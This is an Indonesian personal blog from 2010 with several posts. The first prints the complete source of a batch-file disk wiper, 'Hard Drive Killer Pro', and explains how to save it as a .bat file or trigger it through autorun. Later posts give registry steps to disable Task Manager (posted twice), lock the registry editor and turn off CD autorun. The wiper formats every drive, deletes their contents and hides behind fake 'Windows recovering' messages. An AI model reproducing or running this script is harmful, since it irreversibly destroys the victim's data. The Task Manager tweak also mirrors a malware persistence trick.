Sunday 5 September 2010 virus pembunuh Posted by ARYO at 01:39

mungkin anda sudah tidak kaget dengan source virus yang satu ini,salah satu virus yang sangat membahayakan bagi komputer anda.
source virus ini biasa digunakan atau dipasang oleh pihak2 yang kejam,pernah saya utarakan virus ini pernah dipasang di suatu cd bajakan dan diberi autorun,jadi ketika kita memasukan cd tersebut kedalam komputer/laptop anda otomatis virus ini berjalan jika autorun anda tidak dinonaktifkan.dan hanya selang beberapa detik saja smua data hardiskmu akan lenyap seperti hardisk kosong yang baru anda beli.jika file ini dipasang para pembuat virus yg kejam wah..berbahaya juga yah,sedangkan kita hanya terkena virus2 perusak dan pengopy data kita ajah dah kesusahan..yah begitulah kita harus jeli sendiri dalam melihat data dari luar.
oke ini suatu contoh aja bukan bermaksud menyebarkan atau yg lain.
setidaknya bisa menjadi pengetahuan bagi anda,tentunya yang belum tau aja bagi yang sudah master g usah dibaca dech.
file ini saorce mentah yang bisa anda simpan dinotepad .txt
jika mungkin anda ingin mencobanya dikomputer anda sendiri mungkin notepad itu bisa anda rubah menjadi file .bat.
contoh virus.bat <--cara berjalanya hanya anda klik aja file bat itu 2x atau juga bisa dibuat file autorun :).saya sarankan jangan mencoba2 untuk bermain2 dengan virus 1 ini,kasian ama yg banyak data2 pentingnya.bisa nangis2 dech kehilangan data2 dalam beberapa detik.oke salam damai ya hehehe... <-------------------------->
code:

@echo off
rem This program is dedecated to a very special person that does not want to be named.

:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul

rem Drive checking and assigning the valid drives to the drive variable.

set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, don’t worry about how it
rem works, it’s damn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.

echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find “Vol” > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem When errorlevel is 1, then the above is not true, if 0, then it’s true.
rem Opposite of binary rules. If 0, it will elaps to the next command.

echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find “bytes” > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if errorlevel is 1, then the drive specified is a removable media drive – not ready.
rem if errorlevel is 0, then it will elaps to the next command.

echo @prompt dir %%%%1:.\/ad/w/-p $b find ” 0 bytes free” > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if it’s errorlevel 1, then the specified drive is a hard or floppy drive.
rem if it’s not errorlevel 1, then the specified drive is a CD-ROM drive.

echo :enddc >>drivechk.bat

rem Drive checking insertion ends here. “enddc” stands for “end dDRIVE cHECKING”.

rem Now we will use the program drivechk.bat to attain valid drive information.

:testdrv

for %%a in (%alldrive%) do call drivechk.bat %%a >nul
if %drive%.==. set drive=c
del drivechk.bat >nul

:form_del
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Welcome to the land of death. Munga Bunga’s Hard Drive Killer Pro Version 4.0. >>c:\autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat
echo echo 3. This breach of your security will benefit you in the long-run, so don’t worry. Think about it.>>c:\autoexec.bat

echo echo. >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Munga Bunga >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat

:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in (“if not exist %%2\nul md %%2″ “if exist %%2\nul cd %%2″) do %%%%a >>c:\temp.bat
echo for %%%%a in (“>ass_hole.txt”) do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat
echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\% %2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2 \%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\% %2\%%2\nul goto startmd >>c:\temp.bat
call attrib +r +h c:\temp.bat >nul

cls
echo Initializing Variables . . .
rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .

for %%a in (%drive%) call deltree /y %%a:\*. >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
echo Starting Application . . .
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul

cls
echo Thank you for using a Munga Bunga product.
echo.
echo Here is a joke for you . . .
echo.
echo Q). What’s the worst thing about being an egg?
echo A). You only get laid once.
echo.
echo Don’t you just love that one?
echo.
echo Regards,
echo.
echo Munga Bunga

:end

pengetahuan itu penting dan pengalaman itu lebih penting karena dimana kita pernah memiliki suatu hal yang membuat kita bisa tertawa ataupun membuat kita menangis :-)

Thursday 2 September 2010 Menonaktifkan Task Manager Posted by ARYO at 07:29

Task Manager merupakan sebuah fitur standar yang sudah terintregasi
dalam berbagai versi windows yang berbasis NT,seperti Windows NT,2000,xp dan vista.
Fungsinya adalah untuk menginformasikan proses dan aplikasi yang sedang bekerja,
mengubah prioritas,menampilkan informasi performa pc,dan masih banyak lagi

dengan menonaktifkan task manager,saat user menekan Ctrl+Alt+Del,fitur tersebut tidak akan dapat diakses.
dan hanya akan peringatan "Task Manager has been disabled by your Administrator".
demikian pulsa jika pengguna mengklik kanan mouse ditaskbar opsi Task Manager akan diredupkan
dan tidak dapat diklik.

langsung saja saya beri langkah2 untuk menonaktifkannya.


1.jalankan registry editor


2.masuklah ke dalam key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System.


3.jika sub key Sytem belum ada,Anda dapat membuatnya dengan mengklik Edit>New>key kemudian beri nama System.


4.Buat DWORD value baru dengan mengklik kanan mouse pada bagian kanan jendela kemudian pilih New>DWORD value,dan beri nama DisableTaskMgr.


5.klik DisableTaskMgr tadi kemudian isikan value datanya dengan nilai 1.


6.tutup registry editor kemudian log off atau restart windows anda.

setelah anda hidupkan kembali fungsi task manager tersebut sudah nonaktif
selamat mencoba.

Menonaktifkan Task Manager Posted by ARYO at 07:29

Task Manager merupakan sebuah fitur standar yang sudah terintregasi
dalam berbagai versi windows yang berbasis NT,seperti Windows NT,2000,xp dan vista.
Fungsinya adalah untuk menginformasikan proses dan aplikasi yang sedang bekerja,
mengubah prioritas,menampilkan informasi performa pc,dan masih banyak lagi

dengan menonaktifkan task manager,saat user menekan Ctrl+Alt+Del,fitur tersebut tidak akan dapat diakses.
dan hanya akan peringatan "Task Manager has been disabled by your Administrator".
demikian pulsa jika pengguna mengklik kanan mouse ditaskbar opsi Task Manager akan diredupkan
dan tidak dapat diklik.

langsung saja saya beri langkah2 untuk menonaktifkannya.


1.jalankan registry editor


2.masuklah ke dalam key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System.


3.jika sub key Sytem belum ada,Anda dapat membuatnya dengan mengklik Edit>New>key kemudian beri nama System.


4.Buat DWORD value baru dengan mengklik kanan mouse pada bagian kanan jendela kemudian pilih New>DWORD value,dan beri nama DisableTaskMgr.


5.klik DisableTaskMgr tadi kemudian isikan value datanya dengan nilai 1.


6.tutup registry editor kemudian log off atau restart windows anda.

setelah anda hidupkan kembali fungsi task manager tersebut sudah nonaktif
selamat mencoba.

cara untuk melindungi registry Posted by ARYO at 07:25

Registry merupakan jantung bagi windows.segala pengaturan sistem operasi windows tersimpan di sini.
bisa dibayangkan apa yang terjadi jika registry itu sampe diakses orang yang jail.
Mengingat betapa pentingnya registry,saya berbagi cara untuk mengunci registry anda dari tangan2 jail,
cara ini diperuntukan yang memakai OS windows xp sampe ke vista.

1.Jalankan regsitry editor melalui Start > Run dan ketik regedit lalu ok.
kemudian anda masuk ke dalam key HKEY_USERS\.DEFAULT\software\Micosoft\Windows\CurrentVersion\policies\system.


2.Buatlah sebuah data DWORD dengan nama
DisableRegistryTools dan isikan datanya dengan 0.


3.Lakukan back up registri pada key tersebut,yaitu dengan mengklik Regsitry > Export Registry File dan
berikan namanya ,misal Open.


4.Kemudian kembali ke data DWORD tersebut,
dan gantilah nilainya dengan 1.


5.ulangi langkah 3 dengan memberikan nama yang
berbeda,misalnya Close.


6.sekarang keluar dari registry editor dan cobalah menjalankan kembali.
windows akan mengeluarkan pesan yang menyatakan bahwa anda tidak dapat mengedit registry.

Dengan cara tadi,anda dapat membuka registry dengan menjalankan file yang bernama Open.reg
dan memproteksinya dengan mengeksekusi file Close.reg.
oke smoga ini bisa bermanfaat untuk yang membutuhkan.
and terima kasih banyak yang sudah nyempatin mbaca2 coretan2 ini :).

mematikan fungsi autorun Posted by ARYO at 07:20

autorun ini sangat memudahkan pengguna untuk melihat data yang masuk entah dari cd drive atau dari usb flasdisk atauun hardisk external.
tapi disisi lain fitur ini justru menjadi perantara virus dalam mempermudah serangan.
berbagai virus menggunakan autorun sebagai jalan masuk kesistem windows tanpa kita tau dan kita sadari
entah itu dari media flasdisk cd yang masuk kewindows kita.

dengan menonaktifkan fitur autorun ini anda secara tidak sengaja juga akan mencegah komputer anda dari serangan virus dari media luar.
dan yg sering melihat file2 viruspun dapat mendelet dengan manual file tersebut sebelum menyebar.
saya sendiri pernah menemukan sebuah cd bajakan yang disitu terpasang virus yang efeknya memformat windows anda dalam beberapa detik
setelah anda restart komputer tak akan bisa menyala karena file2 exe diwindows terformat abis.
mungkin si pembuat cd bermaksud agar cd tersebut tidak dapat dicopy ulang atau dibajak lagi.
nah dari pengalaman tersebut saya menerapkan untuk mematikan fungsi autorun agar keamanan lebih terjaga.
oke itu sedikit cerita tentang autorun.
sekarang akan saya berikan cara untuk menonaktifkanya semoga bisa berguna bagi anda,karena selain antivirus cara ini sangat efektif untuk mencegah virus yang masuk.terkecuali virus yang dirinya mengkopi data kita
sehingga kita tidak sengaja mengklik data itu sehingga virus itu menyebar ketika kita klik.
untuk itu saya harap anda melihat besarnya data folder anda sebelum mengkliknya,karena folder virus kebanyakan hanya bernilai .kb dan jika anda perhatikan benar2 folder2 virus sangat berbeda bentuk dengan folder yg asli.
oke langsung aja
pertama siapkan kopi panas kalau yang suka dingin ya es kopi dech hehehe..
sabar brow jangan tegang..wakakak..

last..

1.masuk ke menu registry yaitu dengan cara Start>run>regedit ok

2.silahkan masuk ke sub key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CDRom.

3.Pada sub key CDRom tersebut klik gambar DWORD value bernama Autorun,isikan nilainya dengan angka 0.

4.restart komputer anda untuk merasakan perubahanya.

untuk mengembalikan seting ke kondisi semula anda dapat mengembalikan nilai autorun dengan nilai 1